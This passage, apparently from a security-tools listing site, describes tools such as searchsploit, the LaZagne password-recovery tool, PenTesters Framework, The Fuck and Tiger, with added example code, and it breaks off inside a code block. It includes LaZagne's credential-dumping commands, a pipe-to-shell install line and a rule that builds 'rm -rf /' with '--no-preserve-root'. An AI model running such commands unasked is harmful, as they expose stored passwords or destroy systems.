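    build_tcp_packet(40000, 80, 0x18, b"GET / HTTP/1.0\r\n"),  # PSH+ACK with 16 bytes
    build_tcp_packet(40001, 53, 0x18, b"x" * 10),              # not port 80
]
SAMPLE_PCAP = build_pcap(SAMPLE_FRAMES)

if __name__ == "__main__":
    print(parse_global_header(SAMPLE_PCAP))
    print(http_data_packets(SAMPLE_PCAP))
```

    Only the second frame survives the filter: the SYN has a zero-length payload and the third frame is not on port 80. Reading a file written with --time-stamp-precision=nano only changes the magic number and the divisor applied to the fractional field, which is why older readers that know only the microsecond magic reject such captures.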


    Download Tcpdump

    TeemIp - IP Address Management Solution


    All network administrators recognize how important it is to have a well-managed IP space: a comprehensive and up-to-date inventory of all subnets and IPs used in a network, together with clear and simple processes to request, change or release IPs, are key factors for a trouble-free network.

    Unfortunately, in many companies and organizations, IP management is not perceived as a critical IT operations service. And when it is recognized as such, the price of standard solutions sold by software vendors is so high that investment in a tool is always postponed to the next fiscal year.

    As a consequence, network administrators often struggle to keep a decent inventory of their IP space and fall back on inconvenient spreadsheets or DNS configuration files to do their job.

    TeemIp was created precisely to address that problem. It is a robust open source web application that enables professional IP management within IT departments of any size.

    A simple and powerful user interface allows network administrators to manage their IPv4 and IPv6 plans, subnet space and IPs in accordance with best-in-class IP management practices:
    • Define your IPv4 and IPv6 Plans through hierarchical Network Blocks
    • Delegate IP blocks from parent to child organizations
    • Manage Subnets within predefined Network Blocks
    • Attach IP Ranges to your Subnets
    • Register IPs and get a clear view on the IP space consumption
    • Allow end users to log IP requests through a simple web portal
    • Provide Hostmasters efficient processes to manage user requests
    • Proactively notify administrators on key events
    • Synchronize your data with external tools

    Because IPs are configured on network devices, a CMDB (Configuration Management Database) has been included in the product. This CMDB allows you to document all types of devices that can be connected to an IP network together with their links to the IP space (IPs they use, such as management IPs, or IPs they host, such as on router interfaces).

    To give end users an easy way to log IP-related requests, a web portal has been incorporated into TeemIp. Tickets created through that portal are then processed through a Helpdesk module, providing the network administrator with a quick, efficient and easy process to allocate, change or release IP resources.

    TeemIp has been developed as an extension of the iTop open source ITSM and CMDB software and therefore benefits from all its features and advanced functions. It is available as a standalone application or as a module that can be installed on an already working iTop installation.

    TeemIp relies on Apache, MySQL and PHP, so it can run on any operating system that supports those applications: it has already been tested on Windows, Debian Linux and Red Hat. Because it is a web-based application you don't need to install any client on users' PCs. A web browser is enough to use it.


    TestDisk - Partition Recovery and File Undelete for Windows, Linux and Mac



    TestDisk is powerful free data recovery software! It was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software: certain types of viruses or human error (such as accidentally deleting a Partition Table). Partition table recovery using TestDisk is really easy.

    TestDisk can:
    • Fix partition table, recover deleted partition
    • Recover FAT32 boot sector from its backup
    • Rebuild FAT12/FAT16/FAT32 boot sector
    • Fix FAT tables
    • Rebuild NTFS boot sector
    • Recover NTFS boot sector from its backup
    • Fix MFT using MFT mirror
    • Locate ext2/ext3/ext4 Backup SuperBlock
    • Undelete files from FAT, exFAT, NTFS and ext2 filesystem
    • Copy files from deleted FAT, exFAT, NTFS and ext2/ext3/ext4 partitions.
    TestDisk has features for both novices and experts. For those who know little or nothing about data recovery techniques, TestDisk can be used to collect detailed information about a non-booting drive which can then be sent to a tech for further analysis. Those more familiar with such procedures should find TestDisk a handy tool in performing onsite recovery.

    Operating systems 

    TestDisk can run under
    • DOS (either real or in a Windows 9x DOS-box),
    • Windows (NT4, 2000, XP, 2003, Vista, 2008, Windows 7 (x86 & x64)),
    • Linux,
    • FreeBSD, NetBSD, OpenBSD,
    • SunOS and
    • MacOS X

    Filesystems

    TestDisk can find lost partitions for all of these file systems:
    • BeFS ( BeOS )
    • BSD disklabel ( FreeBSD/OpenBSD/NetBSD )
    • CramFS, Compressed File System
    • DOS/Windows FAT12, FAT16 and FAT32
    • XBox FATX
    • Windows exFAT
    • HFS, HFS+ and HFSX, Hierarchical File System
    • JFS, IBM's Journaled File System
    • Linux btrfs
    • Linux ext2, ext3 and ext4
    • Linux GFS2
    • Linux LUKS encrypted partition
    • Linux RAID md 0.9/1.0/1.1/1.2
      • RAID 1: mirroring
      • RAID 4: striped array with parity device
      • RAID 5: striped array with distributed parity information
      • RAID 6: striped array with distributed dual redundancy information
    • Linux Swap (versions 1 and 2)
    • LVM and LVM2, Linux Logical Volume Manager
    • Mac partition map
    • Novell Storage Services NSS
    • NTFS ( Windows NT/2000/XP/2003/Vista/2008/7 )
    • ReiserFS 3.5, 3.6 and 4
    • Sun Solaris i386 disklabel
    • Unix File System UFS and UFS2 (Sun/BSD/...)
    • XFS, SGI's Journaled File System
    • Wii WBFS
    • Sun ZFS

    Download TestDisk

    The Exploit-Database Git Repository


    This is the official repository of The Exploit Database, a project sponsored by Offensive Security.

    The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away.

    This repository is updated daily with the most recently added submissions.

    Included with this repository is the searchsploit utility, which will allow you to search through the exploits using one or more terms.

    root@kali:~# searchsploit -h
    Usage  : searchsploit [OPTIONS] term1 [term2] ... [termN]
    Example: searchsploit oracle windows local
    
    =========
     OPTIONS
    =========
     -c         - Perform case-sensitive searches; by default,
                  searches will try to be greedy
     -v         - By setting verbose output, description lines
                  are allowed to overflow their columns
     -h, --help - Show help screen
    
    NOTES:
     - Use any number of search terms you would like (minimum: 1)
     - Search terms are not case sensitive, and order is irrelevant
    
    root@kali:~# searchsploit afd windows local
    ----------------------------------------------------------------|----------------------------------
    Description                                                     |  Path
    ----------------------------------------------------------------|----------------------------------
    MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plug | /windows/local/6757.txt
    Microsoft Windows xp AFD.sys Local Kernel DoS Exploit           | /windows/dos/17133.c
    Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (M | /windows/local/18176.py
    Windows - AfdJoinLeaf Privilege Escalation (MS11-080)           | /windows/local/21844.rb
    ----------------------------------------------------------------|----------------------------------
    root@kali:~#
    
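    An added example, not code from the Exploit Database repository, that reproduces the search semantics the help text above describes: every term must match, term order is irrelevant, and matching is case-insensitive unless -c is given. It assumes the index is a CSV with `file` and `description` columns (the column layout is an assumption, not shown on this page); the rows are constructed for illustration and are not real EDB entries.

```python
"""Term-matching in the style of searchsploit. Added example; not the tool's code."""
import csv
import io

# Constructed index excerpt in the column layout assumed for the repository's
# CSV index (id,file,description,date,author,platform,type,port). The rows are
# made up for illustration and are not real Exploit Database entries.
SAMPLE_INDEX = """id,file,description,date,author,platform,type,port
1,platforms/windows/local/1.txt,"Sample OS Driver Privilege Escalation (demo)",2008-01-01,demo,windows,local,0
2,platforms/windows/dos/2.c,"Sample OS Driver Kernel DoS (demo)",2011-01-01,demo,windows,dos,0
3,platforms/linux/remote/3.py,"Sample Service Remote Overflow (demo)",2012-01-01,demo,linux,remote,8080
"""


def load_index(text):
    """Parse the CSV index into a list of row dictionaries."""
    return list(csv.DictReader(io.StringIO(text)))


def searchsploit(rows, terms, case_sensitive=False):
    """Return (description, path) pairs for rows in which every term occurs
    in the description or the path. Term order is irrelevant; matching is
    case-insensitive unless case_sensitive is set (the -c flag)."""
    if not terms:
        raise ValueError("at least one search term is required")
    needles = list(terms) if case_sensitive else [t.lower() for t in terms]
    hits = []
    for row in rows:
        haystack = "%s %s" % (row["description"], row["file"])
        if not case_sensitive:
            haystack = haystack.lower()
        if all(n in haystack for n in needles):
            hits.append((row["description"], row["file"]))
    return hits


def render(hits, desc_width=64):
    """Two-column table like the tool's output; long descriptions are cut."""
    sep = "-" * desc_width + "|" + "-" * 34
    lines = [sep, "Description".ljust(desc_width) + "|  Path", sep]
    for desc, path in hits:
        lines.append(desc[:desc_width].ljust(desc_width) + "| " + path)
    lines.append(sep)
    return "\n".join(lines)


if __name__ == "__main__":
    index = load_index(SAMPLE_INDEX)
    print(render(searchsploit(index, ["driver", "windows", "local"])))
```

    Because the path is part of the text searched, a term such as "local" also matches through the directory name, which is why a platform or exploit-type word narrows results even when it is absent from the title.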


    Download The Exploit-Database Git Repository

    The LaZagne Project - Recover most common software passwords (Firefox, IE, Opera, Chrome, Filezilla, winscp, coreFTP, WiFi and many more)


    The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each piece of software stores its passwords using different techniques (plaintext, an OS API, custom algorithms, etc.). This tool has been developed to find those passwords for the most common software. At this moment, it supports 22 programs on Windows and 12 on Linux.

    Usage
    • Launch all modules
      • cmd: laZagne.exe all
    • Launch only a specific module
      • cmd: laZagne.exe <module>
      • example: laZagne.exe browsers
      • help: laZagne.exe -h
    • Launch only a specific software script
      • cmd: laZagne.exe <module> -f <software>
      • example: laZagne.exe browsers -f
      • help: laZagne.exe browsers -h
    • Write all passwords found into a file (-w options)
      • cmd: laZagne.exe all -w

    Supported softwares
    • Windows (tested on Windows XP, 7 and 8 - 32 and 64 bits)
      • browsers
        • firefox
        • chrome
        • opera
        • ie
      • chats
        • skype
        • pidgin
        • jitsi
      • mails
        • thunderbird
        • outlook
      • adminsys
        • filezilla
        • puttycm
        • winscp
        • cyberduck
        • coreFTP
        • FTPNavigator
      • database
        • sqldeveloper
        • squirrel
        • dbvisualizer
      • svn
        • tortoise
      • wifi
        • Wireless Network Password (Windows mechanism)
      • windows credentials
        • Domain visible network (.Net Passport)
        • Generic network credentials
    • Linux
      • browsers
        • firefox
        • opera
      • chats
        • pidgin
        • jitsi
      • mails
        • thunderbird
      • adminsys
        • filezilla
        • environment variables
      • database
        • sqldeveloper
        • squirrel
        • dbvisualizer
      • wifi
        • network manager
      • wallet
        • gnome keyring


    IE Browser history

    Internet Explorer passwords (from IE7 up to, but not including, Windows 8) can only be decrypted using the URL of the website: the URL is passed as an argument to the Win32 CryptUnprotectData API. So to decrypt them, it is necessary to retrieve the IE browser history. To do that, I have used C code. So I used a DLL (the code is in the "browser_history_dll" directory), and it is directly embedded in the Python code as a base64 string (see ie.py). Once launched, the DLL is written to disk, a wrapper is used to call the DLL functions, and then the DLL file is removed from the disk.


    Build your own password recovery script

    It is possible to write your own script for the software of your choice.
    To do that, the script must follow a few conventions:
    • Create a class using the name of the software
    • This class has to have a function called "retrieve_password" (it will be the main function)
    • The output containing all passwords has to be sent to the "print_output" function - ex: print_output(, password_list)
      • password_list has to be an array of dictionaries.
    • Optional: you could use the function "print_debug" to print your output
      • ex: print_debug("ERROR", "Failed to load ...")
    • Use an existing script to understand what I have said :)
    If you want to improve this tool, you could send me your script and it will be added to this project (authors will of course be credited on each script ;)).

    Requirements

    To compile the source code, some external libraries are required.



    Download The LaZagne Project

    The Penetration Testers Framework (PTF) - Is a Way for Modular Support for Up-to-date Tools


    A TrustedSec Project - The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for penetration testing. As pentesters, we've become accustomed to the /pentest/ directories or our own toolsets that we want to keep up to date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

    PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion consistent with the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

    The ultimate goal is community support for this project. We want new tools added to the GitHub repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.

    Instructions: 

    First check out the config/ptf.config file which contains the base location of where to install everything. By default this will install in the /pentest directory. Once you have that configured, move to running PTF by typing ./ptf (or python ptf).

    This will put you in a Metasploit-style shell with a similar look and feel for consistency. show modules, use, etc. are all accepted commands. First things first, always type help or ? to see a full list of commands.

    Update EVERYTHING!

    If you want to install and/or update everything, simply do the following:
    ./ptf
    use modules/install_update_all
    run

    This will install all of the tools inside of PTF. If they are already installed, this will iterate through and update everything for you automatically.

    You can also show options to change information about the modules.

    Modules:

    First, head over to the modules/ directory, inside of there are sub directories based on the Penetration Testing Execution Standard (PTES) phases. Go into those phases and look at the different modules. As soon as you add a new one, for example testing.py, it will automatically be imported next time you launch PTF. There are a few key components when looking at a module that must be completed.

    Below is a sample module

    Module Development:

    All of the fields are pretty easy. For repository locations, right now all that's supported is GIT; the plan for the next release is to expand to a file downloader, and this can still be accomplished through after commands (explained later). Fill in the depends and where you want the install location to be. PTF will take where the Python file is located (for example exploitation) and move it to what you specify in the PTF config (located under config). By default it installs all your tools under /pentest/, in a subdirectory named after the phase.
    Note that in modules you can specify {INSTALL_LOCATION} in after commands. This expands to the install location when the after commands run.

    After Commands:

    After commands are commands that you can insert after an installation. This could be switching to a directory and kicking off additional commands to finish the installation. For example in the BEEF scenario, you need to run ruby install-beef afterwards. Below is an example of after commands using the {INSTALL_LOCATION} flag.
    AFTER_COMMANDS="cp config/dict/rockyou.txt {INSTALL_LOCATION}"

    For AFTER_COMMANDS that self-install (no user interaction needed), place an exit after your commands so the shell exits.
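    A dry-run of what PTF does with a module, as an added example for this page (not PTF's own code): resolve the install directory from the module's location and the config base directory, expand {INSTALL_LOCATION} in AFTER_COMMANDS, and flag a repository fetched without transport security or an install path that escapes the phase directory. The page shows only AFTER_COMMANDS and {INSTALL_LOCATION}; the other field names (INSTALL_TYPE, REPOSITORY_LOCATION, INSTALL_LOCATION), the comma-separated after-command list and the sample module are assumptions.

```python
"""Dry-run a PTF-style module without cloning or executing anything.

Added example for this page, not PTF's own code. Field names other than
AFTER_COMMANDS / {INSTALL_LOCATION}, the comma-separated after-command list
and SAMPLE_MODULE are assumptions."""
import ast
import posixpath
import re

# One KEY="python literal" assignment per line.
_ASSIGN = re.compile(r'^\s*([A-Z_]+)\s*=\s*(.+?)\s*$')


def parse_module(text):
    """Parse the flat KEY=value layout into a dict.

    The module is a .py file, but it is parsed rather than imported: a module
    pulled in from a third-party repo should not get code execution on the
    tester's box merely by being listed."""
    fields = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue
        m = _ASSIGN.match(line)
        if m:
            fields[m.group(1)] = ast.literal_eval(m.group(2))
    return fields


def plan(module_text, module_path, base_dir='/pentest'):
    """Return (install_dir, after_commands, warnings) for one module.

    module_path is e.g. 'modules/exploitation/tool.py'; the PTES phase is the
    directory the module lives in and the tool lands under
    <base_dir>/<phase>/<INSTALL_LOCATION>."""
    f = parse_module(module_text)
    phase = posixpath.basename(posixpath.dirname(module_path))
    phase_dir = posixpath.join(base_dir, phase)
    install_dir = posixpath.normpath(
        posixpath.join(phase_dir, f.get('INSTALL_LOCATION', '')))

    # {INSTALL_LOCATION} in AFTER_COMMANDS becomes the resolved directory.
    after = [c.strip().replace('{INSTALL_LOCATION}', install_dir)
             for c in f.get('AFTER_COMMANDS', '').split(',') if c.strip()]

    warnings = []
    repo = f.get('REPOSITORY_LOCATION', '')
    secure = repo.startswith(('https://', 'git@', 'ssh://'))
    if f.get('INSTALL_TYPE', '').upper() == 'GIT' and not secure:
        # Cleartext git clone: anyone on the path can hand you a different tool.
        warnings.append('repository fetched without transport security: ' + repo)
    if install_dir == phase_dir or not install_dir.startswith(phase_dir + '/'):
        warnings.append('INSTALL_LOCATION missing or escapes the phase directory: '
                        + install_dir)
    return install_dir, after, warnings


# Constructed sample module (not a real PTF module).
SAMPLE_MODULE = '''\
#####################################
# Installation module for an imaginary tool
#####################################
AUTHOR="example"
DESCRIPTION="Installs the example tool"
INSTALL_TYPE="GIT"
REPOSITORY_LOCATION="http://git.example.invalid/example-tool.git"
INSTALL_LOCATION="example-tool"
AFTER_COMMANDS="cd {INSTALL_LOCATION},./install.sh"
'''

if __name__ == '__main__':
    d, cmds, warns = plan(SAMPLE_MODULE, 'modules/exploitation/example-tool.py')
    print('install dir :', d)
    print('after cmds  :', cmds)
    for w in warns:
        print('WARNING     :', w)
```

    Run it against a module before adding it to your own PTF tree: the after commands execute with whatever privileges PTF has (normally root), so the expanded command list and the warnings are what you want to read before the first install.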


    Download The Penetration Testers Framework

    TheFuck - Magnificent App Which Corrects Your Previous Console Command


    A few examples:
    ➜ apt-get install vim
    E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
    E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?
    
    ➜ fuck
    sudo apt-get install vim [enter/↑/↓/ctrl+c]
    [sudo] password for nvbn:
    Reading package lists... Done
    ...

    ➜ git push
    fatal: The current branch master has no upstream branch.
    To push the current branch and set the remote as upstream, use
    
        git push --set-upstream origin master
    
    
    ➜ fuck
    git push --set-upstream origin master [enter/↑/↓/ctrl+c]
    Counting objects: 9, done.
    ...
    ➜ puthon
    No command 'puthon' found, did you mean:
     Command 'python' from package 'python-minimal' (main)
     Command 'python' from package 'python3' (main)
    zsh: command not found: puthon
    
    ➜ fuck
    python [enter/↑/↓/ctrl+c]
    Python 3.4.2 (default, Oct  8 2014, 13:08:17)
    ...
    ➜ git brnch
    git: 'brnch' is not a git command. See 'git --help'.
    
    Did you mean this?
        branch
    
    ➜ fuck
    git branch [enter/↑/↓/ctrl+c]
    * master
    ➜ lein rpl
    'rpl' is not a task. See 'lein help'.
    
    Did you mean this?
             repl
    
    ➜ fuck
    lein repl [enter/↑/↓/ctrl+c]
    nREPL server started on port 54848 on host 127.0.0.1 - nrepl://127.0.0.1:54848
    REPL-y 0.3.1
    ...
    If you are not afraid to run the changed command blindly, there is a require_confirmation setting. Note that with confirmation off a rule such as sudo re-runs the failed command as root without showing it to you first:
    ➜ apt-get install vim
    E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
    E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?
    
    ➜ fuck
    sudo apt-get install vim
    [sudo] password for nvbn:
    Reading package lists... Done
    ...

    Requirements
    • python (2.7+ or 3.3+)
    • pip
    • python-dev

    Installation [ experimental ]
    On Ubuntu and OS X you can install The Fuck with the installation script:
    wget -O - https://raw.githubusercontent.com/nvbn/thefuck/master/install.sh | sh - && $0
    This pipes a script fetched over the network straight into sh; if you would rather see what it does first, download it, read it, then run it.

    Manual installation
    Install The Fuck with pip:
    sudo pip install thefuck
    Or using an OS package manager (OS X, Ubuntu, Arch).
    You should place this command in your .bash_profile, .bashrc, .zshrc or other startup script:
    eval "$(thefuck --alias)"
    # You can use whatever you want as an alias, like for Mondays:
    eval "$(thefuck --alias FUCK)"
    Or in your shell config (Bash, Zsh, Fish, Powershell, tcsh).
    Changes will be available only in a new shell session. To make them available immediately, run source ~/.bashrc (or your shell config file, like .zshrc).

    Update
    sudo pip install thefuck --upgrade
    Aliases changed in 1.34.

    How it works
    The Fuck tries to match a rule for the previous command, creates a new command using the matched rule and runs it. Rules enabled by default are as follows:
    • cargo – runs cargo build instead of cargo;
    • cargo_no_command – fixes wrong commands like cargo buid;
    • cd_correction – spellchecks and corrects failed cd commands;
    • cd_mkdir – creates directories before cd'ing into them;
    • cd_parent – changes cd.. to cd ..;
    • composer_not_command – fixes the composer command name;
    • cp_omitting_directory – adds -a when you cp a directory;
    • cpp11 – adds a missing -std=c++11 to g++ or clang++;
    • dirty_untar – fixes a tar x command that untarred into the current directory;
    • dirty_unzip – fixes an unzip command that unzipped into the current directory;
    • django_south_ghost – adds --delete-ghost-migrations to a Django South migration that failed because of ghost migrations;
    • django_south_merge – adds --merge to an inconsistent Django South migration;
    • docker_not_command – fixes wrong docker commands like docker tags;
    • dry – fixes repetitions like git git push;
    • fix_alt_space – replaces Alt+Space with a Space character;
    • fix_file – opens the file that produced an error in your $EDITOR;
    • git_add – fixes "Did you forget to 'git add'?";
    • git_branch_delete – changes git branch -d to git branch -D;
    • git_branch_list – catches git branch list typed in place of git branch and removes the branch it created;
    • git_checkout – fixes the branch name or creates a new branch;
    • git_diff_staged – adds --staged to a previous git diff with unexpected output;
    • git_fix_stash – fixes git stash commands (misspelled subcommand and missing save);
    • git_not_command – fixes wrong git commands like git brnch;
    • git_pull – sets the upstream before executing the previous git pull;
    • git_pull_clone – clones instead of pulling when the repo does not exist;
    • git_push – adds --set-upstream origin $branch to the previous failed git push;
    • git_push_pull – runs git pull when the push was rejected;
    • git_stash – stashes your local modifications before rebasing or switching branch;
    • git_two_dashes – adds a missing dash to commands like git commit -amend or git rebase -continue;
    • go_run – appends the .go extension when compiling/running Go programs;
    • grep_recursive – adds -r when you try to grep a directory;
    • gulp_not_task – fixes misspelled gulp tasks;
    • has_exists_script – prepends ./ when the script/binary exists;
    • heroku_not_command – fixes wrong heroku commands like heroku log;
    • history – tries to replace the command with the most similar command from history;
    • java – removes the .java extension when running Java programs;
    • javac – appends the missing .java when compiling Java files;
    • lein_not_task – fixes wrong lein tasks like lein rpl;
    • ls_lah – adds -lah to ls;
    • man – changes the manual section;
    • man_no_space – fixes man commands without spaces, for example mandiff;
    • mercurial – fixes wrong hg commands;
    • mkdir_p – adds -p when you try to create a directory without its parent;
    • mvn_no_command – adds clean package to mvn;
    • mvn_unknown_lifecycle_phase – fixes misspelled lifecycle phases with mvn;
    • no_command – fixes wrong console commands, for example vom/vim;
    • no_such_file – creates missing directories for mv and cp commands;
    • open – prepends http to the address passed to open;
    • pip_unknown_command – fixes wrong pip commands, for example pip instatl/pip install;
    • python_command – prepends python when you try to run a Python script that is not executable or was invoked without ./;
    • python_execute – appends the missing .py when executing Python files;
    • quotation_marks – fixes uneven usage of ' and " in args;
    • rm_dir – adds -rf when you try to remove a directory;
    • sed_unterminated_s – adds the missing '/' to sed's s commands;
    • sl_ls – changes sl to ls;
    • ssh_known_hosts – removes the host from known_hosts on a host-key warning (this discards the key mismatch that warning exists to surface, so find out why the key changed before accepting it);
    • sudo – prepends sudo to the previous command if it failed because of permissions;
    • switch_lang – switches the command from your local keyboard layout to en;
    • systemctl – correctly orders the parameters of a confusing systemctl;
    • test.py – runs py.test instead of test.py;
    • touch – creates missing directories before "touching";
    • tsuru_login – runs tsuru login if not authenticated or the session expired;
    • tsuru_not_command – fixes wrong tsuru commands like tsuru shell;
    • tmux – fixes tmux commands;
    • unknown_command – fixes hadoop hdfs-style "unknown command", for example adds the missing '-' to the command in hdfs dfs ls;
    • vagrant_up – starts up the vagrant instance;
    • whois – fixes the whois command.
    Enabled by default only on specific platforms:
    • apt_get – installs the app from apt if it is not installed (requires python-commandnotfound / python3-commandnotfound);
    • apt_get_search – changes an attempt to search with apt-get into a search with apt-cache;
    • brew_install – fixes the formula name for brew install;
    • brew_unknown_command – fixes wrong brew commands, for example brew docto/brew doctor;
    • brew_upgrade – appends --all to brew upgrade as per Homebrew's new behaviour;
    • pacman – installs the app with pacman if it is not installed (uses yaourt if available);
    • pacman_not_found – fixes the package name with pacman or yaourt.
    Bundled, but not enabled by default:
    • git_push_force – adds --force to a git push (may conflict with git_push_pull);
    • rm_root – adds --no-preserve-root to an rm -rf / command.

    Creating your own rules
    To add your own rule, create your-rule-name.py in ~/.thefuck/rules. The rule must contain two functions:
    match(command: Command) -> bool
    get_new_command(command: Command) -> str | list[str]
    The rule can also contain an optional function
    side_effect(old_command: Command, fixed_command: str) -> None
    and optional enabled_by_default, requires_output and priority variables.
    Command has three attributes: script, stdout and stderr.
    The rules API changed in 3.0: to access settings in a rule, import them with from thefuck.conf import settings. settings is a special object filled from ~/.thefuck/settings.py and from environment variables (see below).
    A simple example of a rule that re-runs the script with sudo:
    import subprocess  # needed by side_effect below
    
    
    def match(command):
        # Fire on the usual permission-error signatures in the failed command's stderr.
        return ('permission denied' in command.stderr.lower()
                or 'EACCES' in command.stderr)
    
    
    def get_new_command(command):
        # Re-run the same script, prefixed with sudo.
        return 'sudo {}'.format(command.script)
    
    # Optional:
    enabled_by_default = True
    
    def side_effect(command, fixed_command):
        # Runs after the fixed command. This is the page's illustration only:
        # chmod 777 makes the current directory world-writable, so don't copy it as-is.
        subprocess.call('chmod 777 .', shell=True)
    
    priority = 1000  # Lower first, default is 1000
    
    requires_output = True
    More examples of rules, utility functions for rules and app/OS-specific helpers are in the project repository.
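    The stock sudo rule above re-runs anything that printed "permission denied" as root. The rule below, an added example for this page and not part of The Fuck, uses the same match()/get_new_command() API to do the same thing only for an allow-list of binaries and refuses scripts containing shell operators (sudo a | b elevates only a). The Fuck hands the real Command object (script, stdout, stderr, as the page states) to these functions; the namedtuple here is a stand-in so the rule can be exercised offline, and SUDO_ALLOWED is a constructed list to tune per host.

```python
"""A stricter replacement for The Fuck's stock `sudo` rule: re-run as root
only allow-listed commands, never arbitrary ones.

Added example for this page, not part of The Fuck. Save it as
~/.thefuck/rules/sudo_allowlist.py. The Command namedtuple only stands in
for thefuck's own object (same three attributes) for offline testing, and
SUDO_ALLOWED is a constructed list."""
import shlex
from collections import namedtuple

Command = namedtuple('Command', 'script stdout stderr')  # stand-in for thefuck's

# Binaries we are willing to re-run as root automatically. rm, dd, chmod,
# chown, anything curl'd into a shell, etc. are deliberately absent: those
# still fail and get a human decision.
SUDO_ALLOWED = frozenset({'apt-get', 'apt', 'yum', 'dnf', 'systemctl',
                          'pip', 'make', 'tcpdump'})
# Shell operators we refuse to reason about: `sudo a | b` elevates only `a`,
# and redirections/substitutions would run unelevated or twice.
SHELL_OPERATORS = ('|', ';', '&&', '||', '`', '$(', '>', '<')

enabled_by_default = True
requires_output = True
# Lower priority is matched first (page: "Lower first, default is 1000"), so
# 900 wins over the stock `sudo` rule when both match; adding 'sudo' to
# exclude_rules in settings.py removes the stock rule entirely.
priority = 900


def _permission_error(command):
    out = (command.stderr or '') + (command.stdout or '')
    low = out.lower()
    return ('permission denied' in low
            or 'operation not permitted' in low
            or 'are you root?' in low
            or 'EACCES' in out)


def _argv(script):
    try:
        return shlex.split(script)
    except ValueError:  # unbalanced quotes: don't guess what was meant
        return []


def match(command):
    argv = _argv(command.script)
    if not argv or argv[0] == 'sudo':
        return False
    if any(op in command.script for op in SHELL_OPERATORS):
        return False
    return argv[0] in SUDO_ALLOWED and _permission_error(command)


def get_new_command(command):
    return 'sudo ' + command.script


if __name__ == '__main__':
    # Constructed failed-command samples, mirroring the apt-get example above.
    lock_err = ('E: Could not open lock file /var/lib/dpkg/lock - open '
                '(13: Permission denied)')
    ok = Command('apt-get install vim', '', lock_err)
    print(match(ok), get_new_command(ok))
    print(match(Command('rm -rf /var/log', '', 'rm: Permission denied')))
```

    Because rules with a lower priority value are matched first, keep this one below 1000 or The Fuck will still pick the stock sudo rule on the same error.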

    Settings
    The Fuck has a few settings that can be changed in ~/.thefuck/settings.py:
    • rules – list of enabled rules, by default thefuck.conf.DEFAULT_RULES;
    • exclude_rules – list of disabled rules, by default [];
    • require_confirmation – requires confirmation before running the new command, by default True;
    • wait_command – max amount of time in seconds to wait for the previous command's output;
    • no_colors – disable colored output;
    • priority – dict of rule priorities; the rule with the lower priority is matched first;
    • debug – enables debug output, by default False.
    Example of settings.py:
    rules = ['sudo', 'no_command']
    exclude_rules = ['git_push']
    require_confirmation = True
    wait_command = 10
    no_colors = False
    priority = {'sudo': 100, 'no_command': 9999}
    debug = False
    Or via environment variables:
    • THEFUCK_RULES – list of enabled rules, like DEFAULT_RULES:rm_root or sudo:no_command;
    • THEFUCK_EXCLUDE_RULES – list of disabled rules, like git_pull:git_push;
    • THEFUCK_REQUIRE_CONFIRMATION – require confirmation before running the new command, true/false;
    • THEFUCK_WAIT_COMMAND – max amount of time in seconds to wait for the previous command's output;
    • THEFUCK_NO_COLORS – disable colored output, true/false;
    • THEFUCK_PRIORITY – rule priorities, like no_command=9999:apt_get=100; the rule with the lower priority is matched first;
    • THEFUCK_DEBUG – enables debug output, true/false.
    For example:
    export THEFUCK_RULES='sudo:no_command'
    export THEFUCK_EXCLUDE_RULES='git_pull:git_push'
    export THEFUCK_REQUIRE_CONFIRMATION='true'
    export THEFUCK_WAIT_COMMAND=10
    export THEFUCK_NO_COLORS='false'
    export THEFUCK_PRIORITY='no_command=9999:apt_get=100'

    Developing
    Install The Fuck for development:
    pip install -r requirements.txt
    python setup.py develop
    Run unit tests:
    py.test
    Run unit and functional tests (requires docker):
    py.test --enable-functional
    For sending package to pypi:
    sudo apt-get install pandoc
    ./release.py


    Download Thefuck

    Tiger - The Unix security audit and intrusion detection tool


    Tiger is a security tool that can be used both as a security audit and an intrusion detection system. It supports multiple UNIX platforms and is free software provided under the GPL. Unlike other tools, Tiger needs only POSIX tools and is written entirely in shell.

    Tiger has some interesting features that merit its resurrection, including a modular design that is easy to expand, and its double edge: it can be used both as an audit tool and as a host intrusion detection tool. Free Software intrusion detection is currently going many ways, from network IDS (Snort), to the kernel (LIDS or SNARE for Linux and Systrace for OpenBSD, for example), not to mention file integrity checkers (aide, integrit, samhain, tripwire, ...) and log checkers (even more of these; see the Log Analysis pages). Few of them, however, focus fully on the host side of intrusion detection. Tiger complements these tools and also provides a framework in which all of them can work together. Tiger is not a log checker, nor is it focused on integrity analysis. It does "the other stuff": it checks the system configuration and status. Read the manpage for a full description of the checks implemented in Tiger. A good example of what Tiger can do is check_findeleted, a module that determines which network servers running on a system are using deleted files (because libraries were patched during an upgrade but the services were not restarted, so they are still executing the unpatched code).

    Installation
    sudo apt-get install tiger
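    The check_findeleted idea, as an added example for this page rather than Tiger's code (Tiger is shell; this is Python and it covers every readable process, not only network servers): a process whose /proc/<pid>/maps still lists a file marked "(deleted)" is executing code that no longer exists on disk, typically the pre-upgrade copy of a library. parse_maps() is pure and is what the constructed sample exercises; scan_proc() walks a real /proc and needs root to read other users' processes.

```python
"""Find processes that still map libraries deleted from disk (the check that
Tiger's check_findeleted module performs).

Added example for this page, not Tiger's own code. SAMPLE_MAPS is a
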